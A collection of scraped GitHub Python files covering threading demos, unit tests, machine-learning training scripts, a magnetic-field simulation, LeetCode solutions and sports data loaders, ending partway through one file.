+{"seq_id":"3904511991","text":"import threading\nimport time\n\nexit_flag = 0\n\nclass MyThread(threading.Thread):\n def __init__(self, threadId, name, delay):\n threading.Thread.__init__(self)\n self.threadId = threadId\n self.name = name\n self.delay = delay\n\n def run(self):\n print(\"Starting \" + self.name)\n print_time(self.name, 5, self.delay)\n print(\"Exiting \" + self.name)\n\ndef print_time(threadName, counter, delay):\n while counter:\n if exit_flag:\n threadName.exit()\n time.sleep(delay)\n print(\"%s: %s\" % (threadName, time.ctime(time.time())))\n counter -= 1\n\nthread1 = MyThread(1, \"Thread 1\", 1)\nthread2 = MyThread(2, \"Thread 2\", 2)\n\nthread1.start()\nthread2.start()\n# Wait for thread2 to exit\nthread2.join()\n\nprint(\"Exiting Main Thread\")","repo_name":"prubach/Python_Winter_2019_1","sub_path":"threads.py","file_name":"threads.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10786527467","text":"from dom_monitor import DomMonitor\nfrom client.requests_client import RequestClient\nfrom client.selenium_client import SeleniumClient\nfrom unittest import TestCase\n\n\nclass TestDomMonitor(TestCase):\n def test_exec(self):\n dom_monitor = DomMonitor()\n try:\n dom_monitor.exec(\"exec\", \"test.conf\")\n except SystemExit:\n self.fail('SystemExit exception doesn\\'t expected')\n except SystemError:\n self.fail('SystemError exception doesn\\'t expected')\n else:\n self.assertTrue(True)\n\n def test_exec_without_args(self):\n dom_monitor = DomMonitor()\n try:\n dom_monitor.exec()\n except SystemExit as e:\n self.assertEqual(1, e.code)\n else:\n self.fail('SystemExit exception expected')\n\n def test_exec_with_invalid_args(self):\n dom_monitor = DomMonitor()\n try:\n dom_monitor.exec(\"invalid,txt\")\n except SystemExit as e:\n self.assertEqual(1, e.code)\n else:\n self.fail('SystemExit exception expected')\n\n def test_get_client(self):\n client = DomMonitor.get_client(\"test\")\n self.assertTrue(callable(client.get_html))\n\n def test_get_client_requests(self):\n client = DomMonitor.get_client(\"requests\")\n self.assertTrue(isinstance(client, RequestClient))\n\n def test_get_client_selenium(self):\n client = DomMonitor.get_client(\"selenium\")\n self.assertTrue(isinstance(client, SeleniumClient))\n\n def test_get_database(self):\n config = {\n \"hostname\": \"localhost\",\n \"port\": 27017,\n \"username\": \"python\",\n \"password\": \"python\",\n \"database\": \"monitor\",\n }\n db = DomMonitor.get_database(\"test\", config)\n self.assertTrue(callable(db.get_exec_count))\n self.assertTrue(callable(db.get_previous_html))\n self.assertTrue(callable(db.update_exec_count))\n self.assertTrue(callable(db.update_previous_html))\n\n def test_get_notification(self):\n notification = DomMonitor.get_notification({\"slack\": {\"url\": \"\"}})\n self.assertTrue(callable(notification.send))\n\n def test_get_domain(self):\n domain = DomMonitor.get_domain(\"\", \"\", \"\", {\"slack\": {\"url\": \"test\"}})\n self.assertTrue(callable(domain.exec))\n\n","repo_name":"Taurin190/py-dom-monitor","sub_path":"test/test_dom_monitor.py","file_name":"test_dom_monitor.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16429835247","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport os\n\nprint (\"importing numpy\")\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\nprint (\"importing tensorFlow\")\nimport tensorflow as tf\n\nkeras = tf.keras\n\nprint (\"importing tensorFlow datasets\")\nimport tensorflow_datasets as tfds\ntfds.disable_progress_bar()\n\nprint (\"fin des imports\")\n\nSPLIT_WEIGHTS = (8, 1, 1)\nsplits = tfds.Split.TRAIN.subsplit(weighted=SPLIT_WEIGHTS)\n\nprint (\"Loading DataBase Cats vs Dogs\")\n(raw_train, raw_validation, raw_test), metadata = tfds.load(\n 'cats_vs_dogs', split=list(splits),\n with_info=True, as_supervised=True)\n\nprint (\"Loading ok\")\n\nget_label_name = metadata.features['label'].int2str\n\nfor image, label in raw_train.take(2):\n plt.figure()\n plt.imshow(image)\n plt.title(get_label_name(label))\n\n\nplt.show()\n\nIMG_SIZE = 160 # All images will be resized to 160x160\n\ndef format_example(image, label):\n image = tf.cast(image, tf.float32)\n image = (image/127.5) - 1\n image = tf.image.resize(image, (IMG_SIZE, IMG_SIZE))\n return image, label\n\nprint (\"formating the database\")\ntrain = raw_train.map(format_example)\nvalidation = raw_validation.map(format_example)\ntest = raw_test.map(format_example)\n\n\nBATCH_SIZE = 32\nSHUFFLE_BUFFER_SIZE = 1000\n\nprint (\"shuffling the database\")\ntrain_batches = train.shuffle(SHUFFLE_BUFFER_SIZE).batch(BATCH_SIZE)\nvalidation_batches = validation.batch(BATCH_SIZE)\ntest_batches = test.batch(BATCH_SIZE)\n\nIMG_SHAPE = (IMG_SIZE, IMG_SIZE, 3)\n\nprint (\"get the base model\")\n# Create the base model from the pre-trained model MobileNet V2\nbase_model = tf.keras.applications.MobileNetV2(input_shape=IMG_SHAPE,\n include_top=False,\n weights='imagenet')\n","repo_name":"elbixos/M2_Connectionnisme","sub_path":"TransferLearning/Sources/transferLearning.py","file_name":"transferLearning.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"25716073195","text":"from torchvision import transforms, utils\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.utils.data.distributed import DistributedSampler\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.utils.data\nimport torch.nn.functional as F\nimport torchvision\nfrom torchvision import transforms\nfrom sklearn.metrics import classification_report\nfrom PIL import Image\nfrom sklearn import metrics\nfrom sklearn.metrics import roc_curve, auc, confusion_matrix\nimport copy\nimport numpy as np\n\nimport os\nimport time\nimport argparse\nfrom Dataloader import prepare_data, data_prefetcher\nimport apex\nfrom apex import amp\nfrom apex.fp16_utils import *\nfrom apex.parallel import DistributedDataParallel\nfrom apex.multi_tensor_apply import multi_tensor_applier\n\nN = 0\n\n\ndef reduce_tensor(tensor: torch.Tensor) -> torch.Tensor:\n rt = tensor.clone()\n torch.distributed.all_reduce(rt, op=torch.distributed.ReduceOp.SUM)\n return rt\n\n\ndef gather_tensor(tensor: torch.Tensor):\n rt = tensor.clone()\n var_list = [torch.zeros_like(rt) for _ in range(\n torch.distributed.get_world_size())]\n torch.distributed.all_gather(var_list, rt, async_op=False)\n return [i.cpu().numpy() for i in var_list]\n\n\ndef get_cm(AllLabels, AllValues):\n fpr, tpr, threshold = roc_curve(AllLabels, AllValues, pos_label=1)\n Auc = auc(fpr, tpr)\n m = t = 0\n\n for i in range(len(threshold)):\n if tpr[i] - fpr[i] > m:\n m = abs(-fpr[i]+tpr[i])\n t = threshold[i]\n AllPred = [int(i >= t) for i in AllValues]\n Acc = sum([AllLabels[i] == AllPred[i]\n for i in range(len(AllPred))]) / len(AllPred)\n\n Pos_num = sum(AllLabels)\n Neg_num = len(AllLabels) - Pos_num\n cm = confusion_matrix(AllLabels, AllPred)\n print(\"[AUC/{:.4f}] [Threshold/{:.4f}] [Acc/{:.4f}]\".format(Auc, t, Acc))\n print(\"{:.2f}% {:.2f}%\".format(\n cm[0][0] / Neg_num * 100, cm[0][1]/Neg_num * 100))\n print(\"{:.2f}% {:.2f}%\".format(\n cm[1][0] / Pos_num * 100, cm[1][1]/Pos_num * 100))\n\n return Auc, Acc\n\n\ndef run(args, model, optimizer, scheduler, loss_fn, train_loader, val_loader, epochs=20, device=\"cpu\"):\n auc = eval_model(args, model, optimizer, loss_fn, val_loader, device)\n\n for epoch in range(epochs):\n if args.local_rank == 0:\n print('Epoch [{}/{}]'.format(epoch, epochs))\n print('### Train ###')\n train_loader.sampler.set_epoch(epoch)\n auc = train_model(args, model, optimizer,\n loss_fn, train_loader, device)\n scheduler.step()\n\n auc = eval_model(args, model, optimizer, loss_fn, val_loader, device)\n if args.local_rank == 0 and auc >= 0.9950:\n torch.save(model.state_dict(),\n './40X_result/model_{}_{:.4f}.pkl'.format(epoch, auc))\n\n\ndef train_model(args, model, optimizer, loss_fn, dataloader, device):\n model.train()\n\n all_labels = []\n all_values = []\n training_loss = 0.0\n\n prefetcher = data_prefetcher(dataloader)\n inputs, targets = prefetcher.next()\n index = 0\n while inputs is not None:\n index += 1\n output = F.softmax(model(inputs), dim=1)\n loss = loss_fn(output, targets)\n\n optimizer.zero_grad()\n with amp.scale_loss(loss, optimizer) as scale_loss:\n scale_loss.backward()\n optimizer.step()\n\n reduced_loss = reduce_tensor(loss.data) / N\n training_loss += reduced_loss.item()\n\n targets, output = gather_tensor(targets), gather_tensor(output[:, 1])\n\n for j in range(torch.distributed.get_world_size()):\n all_labels.extend(targets[j])\n all_values.extend(output[j])\n\n if args.local_rank == 0 and (index+1) % 1 == 0:\n print('\\t[{}/{}] Loss: {:.4f}'.format(index +\n 1, len(dataloader), reduced_loss.item()))\n\n inputs, targets = prefetcher.next()\n if args.local_rank == 0:\n print(len(all_labels))\n all_labels, all_values = np.array(all_labels), np.array(all_values)\n Loss = training_loss / len(train_loader)\n AUC, Acc = get_cm(all_labels, all_values)\n\n print(\"Train Auc: {:.4f}, Acc: {:.4f}, Loss: {:.4f}\".format(\n AUC, Acc, Loss))\n\n\ndef eval_model(args, model, optimizer, loss_fn, dataloader, device):\n model.eval()\n all_labels = []\n all_values = []\n training_loss = 0\n\n model.eval()\n prefetcher = data_prefetcher(dataloader)\n inputs, targets = prefetcher.next()\n index = 0\n while inputs is not None:\n index += 1\n\n with torch.no_grad():\n output = F.softmax(model(inputs), dim=1)\n loss = loss_fn(output, targets)\n\n reduced_loss = reduce_tensor(loss.data) / N\n training_loss += reduced_loss.item()\n\n targets, output = gather_tensor(targets), gather_tensor(output[:, 1])\n\n for j in range(torch.distributed.get_world_size()):\n all_labels.extend(targets[j])\n all_values.extend(output[j])\n\n if args.local_rank == 0 and (index+1) % 1 == 0:\n print('\\t[{}/{}] Loss: {:.4f}'.format(index +\n 1, len(dataloader), reduced_loss.item()))\n inputs, targets = prefetcher.next()\n\n if args.local_rank == 0:\n print(len(all_labels))\n all_labels, all_values = np.array(all_labels), np.array(all_values)\n Loss = training_loss / len(train_loader)\n AUC, Acc = get_cm(all_labels, all_values)\n\n print(\"Val Auc: {:.4f}, Acc: {:.4f}, Loss: {:.4f}\".format(\n AUC, Acc, Loss))\n return AUC\n return\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(\n description='PyTorch Implementation of multiple Instance learning')\n parser.add_argument('--local_rank', type=int, default=0)\n parser.add_argument('--init_method', type=str)\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n args = get_parser()\n torch.backends.cudnn.benchmark = True\n torch.cuda.set_device(args.local_rank)\n torch.distributed.init_process_group(\n 'nccl',\n init_method=args.init_method\n )\n N = torch.distributed.get_world_size()\n\n train_loader, val_loader = prepare_data(args)\n\n device = torch.device(f\"cuda:{args.local_rank}\")\n\n model = torchvision.models.inception_v3(pretrained=True, aux_logits=False)\n model.fc = nn.Linear(2048, 2)\n\n model = apex.parallel.convert_syncbn_model(model).to(device)\n# optimizer = optim.SGD(model.parameters(),lr=1e-3, weight_decay=5e-4, momentum=0.95)\n optimizer = optim.Adam(model.parameters(), lr=1e-3, weight_decay=5e-4)\n\n model, optimizer = amp.initialize(model, optimizer,\n opt_level=\"O1\",\n keep_batchnorm_fp32=None)\n model = DistributedDataParallel(model, delay_allreduce=True)\n\n scheduler = optim.lr_scheduler.MultiStepLR(\n optimizer, milestones=[15, 20], gamma=0.1)\n # Spatial-ECA-Attention\n run(args,\n model,\n optimizer,\n scheduler,\n torch.nn.CrossEntropyLoss(),\n train_loader,\n val_loader,\n epochs=40,\n device=device\n )\n","repo_name":"Klunio/DL-thyroid","sub_path":"2-Segment/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7222,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"20765224864","text":"from typing import Union\n\n\n# Taken from https://github.com/dask/dask/blob/261bf174931580230717abca93fe172e166cc1e8/dask/utils.py\nbyte_sizes = {\n \"kB\": 10**3,\n \"MB\": 10**6,\n \"GB\": 10**9,\n \"TB\": 10**12,\n \"PB\": 10**15,\n \"KiB\": 2**10,\n \"MiB\": 2**20,\n \"GiB\": 2**30,\n \"TiB\": 2**40,\n \"PiB\": 2**50,\n \"B\": 1,\n \"\": 1,\n}\nbyte_sizes = {k.lower(): v for k, v in byte_sizes.items()}\nbyte_sizes.update({k[0]: v for k, v in byte_sizes.items() if k and \"i\" not in k})\nbyte_sizes.update({k[:-1]: v for k, v in byte_sizes.items() if k and \"i\" in k})\n\n\ndef parse_bytes(s: Union[float, str]) -> int:\n if isinstance(s, (int, float)):\n return int(s)\n s = s.replace(\" \", \"\")\n if not any(char.isdigit() for char in s):\n s = \"1\" + s\n\n for i in range(len(s) - 1, -1, -1):\n if not s[i].isalpha():\n break\n index = i + 1\n\n prefix = s[:index]\n suffix = s[index:]\n\n try:\n n = float(prefix)\n except ValueError as e:\n raise ValueError(f\"Could not interpret '{prefix}' as a number\") from e\n\n try:\n multiplier = byte_sizes[suffix.lower()]\n except KeyError as e:\n raise ValueError(f\"Could not interpret '{suffix}' as a byte unit\") from e\n\n result = n * multiplier\n return int(result)\n","repo_name":"ZYJ-q/test_0","sub_path":"nautilus_trader/persistence/funcs.py","file_name":"funcs.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25679413881","text":"import csv\nimport sys\nimport yaml\nimport re\nimport os\n\ndef main():\n if len(sys.argv) != 4:\n print(f\"USAGE: {sys.argv[0]} COUNT EXPORT_DIR OUT.csv\")\n exit(1)\n\n url_base = input(\"URL Base: \")\n with open(sys.argv[1], \"r\") as stream:\n try:\n counts = yaml.safe_load(stream)\n except yaml.YAMLError as exc:\n print(exc)\n exit(1)\n\n def lookup_count(file):\n base, _, ext = file.partition(\".\")\n if ext.upper() != 'PNG':\n print(f\"Skipping {file}\")\n return\n\n path = counts\n for component in base.split('_'):\n if type(path) is int:\n break\n if component not in path:\n print(f\"Skipping {file}\")\n return\n path = path[component]\n return (base, int(path))\n\n files = os.listdir(sys.argv[2])\n files.sort()\n with open(sys.argv[3], 'w') as out:\n w = csv.writer(out)\n w.writerow([\"image\", \"label\", \"item-count\"])\n for file in files:\n res = lookup_count(file)\n if not res: continue\n (base, count) = res\n w.writerow([f\"{url_base}/{file}\", file, count])\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"theKidOfArcrania/monopoly_deal_millionare_svg","sub_path":"scripts/export_pc.py","file_name":"export_pc.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23986793156","text":"#!/usr/bin/env python\n# Author: Daniel Pasut \n\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom numpy import linalg as LA\nfrom pylab import *\nfrom tqdm import tqdm\nimport sys\nfrom scipy.integrate import odeint\nfrom scipy.integrate import ode\n\n# Solenoid\ngs = 30 # Grid spacing\nR = 0.5 # Radius of loop (mm)\nwr = 0.1 # Radius of wire (mm)\np = 0.1 # Pitch of wire, centre-to-centre (mm)\nN = 100 # Number of segments in single loop of wire\nn = int(sys.argv[1])#1 # Number of loops of wire\ntheta = np.empty(n*N)\nmu = 1 # Magnetic susceptibility\nI = 10 # Current\nC = mu*I/(4*np.pi)\n\n# Geometry\nxmin = -2.1\nxmax = 2.1\nymin = -2.1\nymax = 2.1\nzmin = -1.1\nzmax = p*n*2+1.1\nx = np.linspace(xmin, xmax, gs) # Positions for x\ny = np.linspace(ymin, ymax, gs) # Positions for y\nz = np.linspace(zmin, zmax, gs) # Positions for z\nY, Z = np.meshgrid(y, z, indexing='ij') # Grid for y/z\n\n# Cell/beads\nRb = 3.5e-6\nRc = 3.5e-5\nmuo = np.pi*4e-7\nmuw = 10e-3\nchi = 0.17\nrhob = 1.5e3\nrhoc = 1020\nrhow = 1000\ng = 9.81\n\nMagConst = (4*np.pi*Rb**3*chi/(3*muo))\nViscConst = 6*np.pi*muw*Rc\nm = (4/3)*np.pi*Rb**3*rhob + (4/3)*np.pi*(Rc**3-Rb**3)*rhoc\nVc = (4/3)*np.pi*Rc**3\nVb = (4/3)*np.pi*Rb**3\n\n# Book keeping\nBdotGradB = np.zeros([1, 3])\nV = np.zeros(3)\ntstep = 0.01\nt0 = 0\nt1 = 1\nt = np.arange(t0, t1, tstep)\n\nVt = g*(rhoc-rhow)*Vc/(6*np.pi*muw*Rc) #terminal velocity\nL = 1e-2\n\n# Function to do summation over all segments of wire\ndef find_B(pos, theta, R, N, wr):\n cross = 0\n for k in range(1, theta.size):\n rs = np.array([R*np.cos(theta[k]-np.pi/N),\n R*np.sin(theta[k]-np.pi/N),\n (p*(theta[k]-np.pi/N))/np.pi])\n r = pos - rs\n dl = np.array([R*(np.cos(theta[k])-np.cos(theta[k-1])),\n R*(np.sin(theta[k])-np.sin(theta[k-1])),\n p/N])\n cross += C * np.cross(dl, r) / LA.norm(r)**3\n return cross\n\n\n\ndef find_BdotGradB(pos):\n h = np.pi*R/N\n\n Bx, By, Bz = find_B(pos, theta, R, N, wr)\n\n Bx_right, By_right, Bz_right = find_B(pos + [0,h,0], theta, R, N, wr)\n Bx_left, By_left, Bz_left = find_B(pos - [0,h,0], theta, R, N, wr)\n Bx_up, By_up, Bz_up = find_B(pos + [0,0,h], theta, R, N, wr)\n Bx_down, By_down, Bz_down = find_B(pos - [0,0,h], theta, R, N, wr)\n\n bxy = (Bx_right - Bx_left) / 2*h\n byy = (By_right - By_left) / 2*h\n bzy = (Bz_right - Bz_left) / 2*h\n\n bxz = (Bx_up - Bx_down) / 2*h\n byz = (By_up - By_down) / 2*h\n bzz = (Bz_up - Bz_down) / 2*h\n\n # X derivatives calculated by divergence and curl of B\n bxx = -byy - bzz\n byx = bxy\n bzx = - bxz\n return [Bx*bxx + By*bxy + Bz*bxz, Bx*byx + By*byy + Bz*byz, Bx*bzx + By*bzy + Bz*bzz]\n\n\ndef func(X, t):\n xval = 0\n yval = 0\n zval = -1\n return [xval, yval, zval]\n\ndef funcmag(X, t):\n pos = np.array([X[0], X[1], X[2]])\n BdotGradB = find_BdotGradB(pos)\n xval = (1/Vt)*(Vb*chi/(muw*muo*6*np.pi*Rc))*(1/L)*BdotGradB[0]\n yval = (1/Vt)*(Vb*chi/(muw*muo*6*np.pi*Rc))*(1/L)*BdotGradB[1]\n zval = -1 + (1/Vt)*(Vb*chi/(muw*muo*6*np.pi*Rc))*(1/L)*BdotGradB[2]\n return [xval, yval, zval]\n\n\ndef run(X0):\n X = odeint(func, X0, t)\n Xmag = odeint(funcmag,X0,t)\n #print(Xmag[:,2])\n return X, Xmag\n\n\n\n\nif __name__ == '__main__':\n for i in range(0, theta.size):\n theta[i] = i*2*np.pi/N\n\n\n #fig = plt.subplots(figsize=(20, 16), dpi=600)\n\n #plt.plot(t,X[:,2],'r-', lw=5, label='No Magnetic Field')\n #plt.plot(t,Xmag[Xmag[:,2]>2*p*n,2],'b-', lw=5, label='Magnetic Field')\n #plt.axhline(y=2, color='k', linestyle='-',lw=5, label='Bottom of Dish')\n #plt.xlabel('t/T', fontsize=30)\n #plt.ylabel('Z/L', fontsize=30)\n #plt.tick_params(axis='both', which='major', labelsize=30)\n #plt.legend(['No Magnetic Field', 'Magnetic Field', 'Bottom of Dish'], fontsize=30)\n #plt.savefig('diff.png', transparent=True,\n # bbox_inches='tight', pad_inches=0)\n #plt.savefig('diff.jpg', bbox_inches='tight', pad_inches=0)\n #plt.show()\n\n\n fig = plt.figure()#figsize=(20, 16), dpi=600, facecolor='w', edgecolor='k')\n ax = fig.gca(projection='3d')\n\n X0 = [0, 0, 2*p*n+1]\n X, Xmag = run(X0)\n ax.plot(X[:,0],X[:,1],X[:,2], label='test',LineWidth=3)\n\n for i in tqdm(range(0, 10)):\n thetaval = i*2*np.pi/10\n X0= [np.cos(thetaval), np.sin(thetaval), 2*p*n+1]\n X, Xmag = run(X0)\n\n ax.plot(Xmag[Xmag[:,2]>2*p*n,0],Xmag[Xmag[:,2]>2*p*n,1] ,Xmag[Xmag[:,2]>2*p*n,2], label='wire', LineWidth=5)\n\n ax.set_xlabel('\\n' + 'X axis')#, fontsize=30, linespacing=4)\n ax.set_ylabel('\\n' + 'Y axis')#, fontsize=30, linespacing=4)\n ax.set_zlabel('\\n' + 'Z axis')#, fontsize=30, linespacing=4)\n #ax.xaxis._axinfo['label']['space_factor'] = 100\n #plt.legend(['Magnetic Field', 'No Magnetic Field'], fontsize=30)\n\n #plt.tick_params(axis='both', which='major', labelsize=30)\n #plt.savefig('traj_test.png', transparent=True,\n # bbox_inches='tight', pad_inches=0)\n plt.show()\n","repo_name":"dpasut/solenoid-magnetic-field","sub_path":"forces.py","file_name":"forces.py","file_ext":"py","file_size_in_byte":5085,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"12210543530","text":"# importing the requests library \nimport requests \n \n# api-endpoint \nURL = \"https://api.github.com/events\"\n \n# location given here \nlocation = \"delhi technological university\"\n \n# defining a params dict for the parameters to be sent to the API \nPARAMS = {'address':location} \n\npayload = {'key1': 'value1', 'key2': 'value2'}\n#r = requests.get('http://httpbin.org/get', params=payload)\nr = requests.post('http://httpbin.org/post', data = {'key':'value'})\n\n# sending get request and saving the response as response object \n#r = requests.get(url = URL)\n \n# extracting data in json format \n#data = r.url() \n\nprint(r.text)\n \n\"\"\" \n# extracting latitude, longitude and formatted address \n# of the first matching location \nlatitude = data['results'][0]['geometry']['location']['lat'] \nlongitude = data['results'][0]['geometry']['location']['lng'] \nformatted_address = data['results'][0]['formatted_address'] \n \n# printing the output \nprint(\"Latitude:%s\\nLongitude:%s\\nFormatted Address:%s\"\n %(latitude, longitude,formatted_address)) \n\"\"\"","repo_name":"richardg999/Random-JavaScript-code","sub_path":"http_python.py","file_name":"http_python.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2016177900","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 2 10:19:09 2018\n\n@author: pineapple\n\"\"\"\n\n'''\n给定一个非空的整数数组,返回其中出现频率前 k 高的元素。\n\n示例 1:\n\n输入: nums = [1,1,1,2,2,3], k = 2\n输出: [1,2]\n示例 2:\n\n输入: nums = [1], k = 1\n输出: [1]\n说明:\n\n你可以假设给定的 k 总是合理的,且 1 ≤ k ≤ 数组中不相同的元素的个数。\n你的算法的时间复杂度必须优于 O(n log n) , n 是数组的大小\n'''\n\n'''\n我的:时间复杂度O(n) 空间复杂度O(n)\n思路:将数组的元素频率用hash记录下来\n 然后将hash的键值对调用hash_count记录下来,\n 然后在按照hash_count的keys()排序输出对于的元素\n'''\n\nclass Solution(object):\n def topKFrequent(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: List[int]\n \"\"\"\n hash = {}\n for num in nums:\n hash[num] = hash.get(num, 0) + 1\n hash_count = {}\n for key,value in hash.items():\n if value not in hash_count:\n hash_count[value] = [key]\n else:\n hash_count[value].append(key)\n keys = hash_count.keys()[:]\n ans = []\n i = 0\n while i < k:\n n = hash_count[keys.pop()]\n for j in n:\n ans.append(j)\n i+=len(n)\n return ans\n\nnums = [6,0,1,4,9,7,-3,1,-4,-8,4,-7,-3,3,2,-3,9,5,-4,0]\nk = 6\n\n'''\n别人的:时间复杂度O(nlogk) 空间复杂度O(n)\n思路:用优先队列来维护一个长度为k的队列,优先值为元素的个数计数\n'''\n\nclass Solution(object):\n def topKFrequent(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: List[int]\n \"\"\"\n hash = {}\n for num in nums:\n hash[num] = hash.get(num, 0) + 1\n import heapq\n heap = []\n for key,value in hash.items():\n if len(heap) < k:\n heapq.heappush(heap, (value, key))\n else:\n if heap[0][0] < value:\n heapq.heappop(heap)\n heapq.heappush(heap, (value, key))\n return [i[1] for i in heap]\n\n","repo_name":"pppineapple/LeetCode","sub_path":"Algorithms/前K个高频元素.py","file_name":"前K个高频元素.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28020345942","text":"newtonMemo = [[int(0)] * 1001 for _ in range(1001)]\n\ndef newton(n, k):\n if k==0 or n==k:\n return 1\n if newtonMemo[n][k] != 0:\n return newtonMemo[n][k]\n ret = newton(n-1, k) + newton(n-1, k-1)\n newtonMemo[n][k] = ret\n return ret\n\nclass Solution:\n def numberOfWays(self, startPos: int, endPos: int, k: int) -> int:\n stepsRight = abs(endPos - startPos)\n if (k - stepsRight) % 2 == 1 or stepsRight > k:\n return 0\n stepsRight += (k - stepsRight) // 2\n #return newton(k, stepsRight) % int(1e9+7)\n return comb(k, stepsRight) % int(1e9+7)\n","repo_name":"balwierz/LeetCode","sub_path":"2400 number of ways to reach a position after exactly k steps.py","file_name":"2400 number of ways to reach a position after exactly k steps.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23116093957","text":"def my_generator():\n yield 1\n yield 2\n yield 3\n\ng = my_generator()\n\nval = next(g)\nprint(val) #1\nval = next(g)\nprint(val) #2\n#val = next(g)\n#print(val) #3\n#val = next(g)\n#print(val) #Stop itteration\n\nprint(sum(g)) #3 bcs rest was used\n\ndef generetor1(num):\n print(\"start\")\n while num > 0:\n yield num\n num -= 1\n\ng = generetor1(4) # wont print anything !!\n\nval = next(g) #print \"start\"\nprint(val) #print 4\n\nval = next(g) # DONT print \"start\" !!\nprint(val) #print 3\n\ndef firstn_generator(n):\n num = 0\n while num < n:\n yield num\n num += 1\n\nprint(sum(firstn_generator(10))) #45, save memory\n\ndef fib(limit):\n a, b = 0, 1\n while a < limit:\n yield a\n a, b = b, a + b\n\nf = fib(30)\nfor i in f:\n print(i) #print fibonacci nums smaller than 30\n\n\n#in () generetors !!\ngeneretor = (i for i in range(10) if i %2 == 0)\n# in [] list!!\nl = [i for i in range(10) if i %2 == 0]","repo_name":"lukmanis25/AdvancedPythonCourse","sub_path":"Generators.py","file_name":"Generators.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29035665010","text":"from data_tools import load_games\r\n\r\n## ---------------------------- Info about load_games ----------------------------\r\n##\r\n## The function outputs a list of \"game_match\" objects, which represents\r\n## a single match. It has the following attributes:\r\n## league -> just a remainder that its the correct league\r\n##\r\n## season -> the starting year for that season (2012-2013 would be 2012)\r\n##\r\n## date -> the date when that match took place (DD/MM/YY)\r\n##\r\n## home_team -> name of the home team (!! Important to note that most names\r\n## away_team -> name of the away team are slightly changed, because the \r\n## author of those csv files decided\r\n## to do that. For example, \r\n## Manchester United is Man United\r\n## Tottenham Hotspur F.C. is Tottenham !!)\r\n##\r\n## features -> A dictioary with data from the csv files, where each key is\r\n## an entry from the ENTRIES list (except Date, HomeTeam, AwayTeam)\r\n## (!! it doesnt happen often but there might be about 10-20 games\r\n## out of 26k that dont have some of those entries, meaning \r\n## HTAG might have a value of \"\" !!)\r\n##\r\n## ------------ misc stuff ------------\r\n##\r\n## It also stores the games the home team had played against the away team and any\r\n## team this season, the previous season and the season before that. Note that\r\n## a lot of teams might have been demoted from the top leagues so its probable that\r\n## they dont have past info.\r\n## In addition, it also stores the previous season standings\r\n\r\n\r\n## Defines the data entires that will loaded from the csv files\r\n## # 0) season (starting year) or div if from a csv reader\r\nENTRIES = [\"Date\", # 1) date at which it was played\r\n \"HomeTeam\", # 2) home team\r\n \"AwayTeam\", # 3) away team\r\n \"FTHG\", # 4) full time home goals\r\n \"FTAG\", # 5) full time away goals\r\n \"FTR\", # 6) full time result (H, D, A)\r\n \"HTHG\", # 7) half time home goals\r\n \"HTAG\", # 8) half time away goals\r\n \"HTR\", # 9) half time result (H, D, A)\r\n \"HS\", # 10) home shots\r\n \"AS\", # 11) away shots\r\n \"HST\", # 12) home team shots on target\r\n \"AST\", # 13) away team shots on target\r\n \"HF\", # 14) home team fouls\r\n \"AF\", # 15) away team fouls\r\n \"HC\", # 16) home team corners\r\n \"AC\", # 17) away team corners\r\n \"HY\", # 18) home yellow cards\r\n \"AY\", # 19) away yellow cards\r\n \"HR\", # 20) home red cards\r\n \"AR\" # 21) away red cards\r\n ]\r\n\r\n## Properly functioning csv files given these entries\r\n## England --> 2000-2021\r\n## Germany --> 2006-2021\r\n## Italy --> 2005-2021\r\n## Spain --> 2005-2021\r\nLOWER_BOUND = {'England': 2000,\r\n 'Germany': 2006,\r\n 'Italy' : 2005,\r\n 'Spain' : 2005}\r\n\r\n\r\n\r\ndef main():\r\n ## Sample usage\r\n # loads all available premier league games\r\n GAMES = load_games(\"England\", (2000, 2021))\r\n \r\n game = GAMES[123]\r\n # match identifiers\r\n print(f\"\\nSeason {game.season}/{int(game.season) + 1} | {game.date}\")\r\n print(f\"{game.home_team} vs {game.away_team}\\n\")\r\n \r\n # one match features\r\n print(\"### Features ###\")\r\n features = game.features\r\n for feat in features:\r\n print(f\"{feat} -> {features[feat]}\")\r\n\r\n ## If you want to load only one season then\r\n # 1. if only features are needed\r\n GAMES = load_games(\"England\", (2012, 2012))\r\n \r\n # 2. if also the past games are needed then load two year before that\r\n # and ignore 